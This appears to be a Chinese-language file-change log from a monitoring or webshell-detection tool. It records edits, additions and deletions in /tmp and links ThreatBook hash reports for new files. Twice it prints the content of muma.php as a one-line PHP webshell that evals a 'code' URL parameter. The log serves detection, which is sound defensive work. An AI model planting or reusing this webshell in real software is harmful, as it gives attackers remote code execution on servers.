修改文件/tmp/chengzhiyue.txt
文件内容asdfgasdfawfawfawfaw
------------------------
删除文件/tmp/chengzhiyue.txt
------------------------
修改文件/tmp/muma.php
文件内容<?php @eval($_GET['code']); ?>
------------------------
新增文件/tmp/muma1.php
检测报告https://s.threatbook.cn/search?query=f75ecccc5e43f903871a18ca6afa6e751f302569b3763771da7066d17a035ca8&type=sha256
------------------------
删除文件/tmp/123.jpg
------------------------
修改文件/tmp/muma.php
文件内容<?php @eval($_GET['code']); ?>
------------------------
删除文件/tmp/muma.php
------------------------
新增文件/tmp/muma.php
检测报告https://s.threatbook.cn/search?query=f75ecccc5e43f903871a18ca6afa6e751f302569b3763771da7066d17a035ca8&type=sha256
------------------------
修改文件/tmp/123ww.txt
文件内容qwdqwdq
123456------------------------
删除文件/tmp/muma.php
------------------------
新增文件/tmp/muma.php
检测报告https://s.threatbook.cn/search?query=f75ecccc5e43f903871a18ca6afa6e751f302569b3763771da7066d17a035ca8&type=sha256
------------------------
删除文件/tmp/muma.php
------------------------新增文件/tmp/muma.php
检测报告https://s.threatbook.cn/search?query=f75ecccc5e43f903871a18ca6afa6e751f302569b3763771da7066d17a035ca8&type=sha256
------------------------
删除文件/tmp/muma.php
------------------------
新增文件/tmp/muma.php
检测报告https://s.threatbook.cn/search?query=f75ecccc5e43f903871a18ca6afa6e751f302569b3763771da7066d17a035ca8&type=sha256
------------------------
删除文件/tmp/muma.php
------------------------
新增文件/tmp/muma.php
检测报告https://s.threatbook.cn/search?query=f75ecccc5e43f903871a18ca6afa6e751f302569b3763771da7066d17a035ca8&type=sha256
------------------------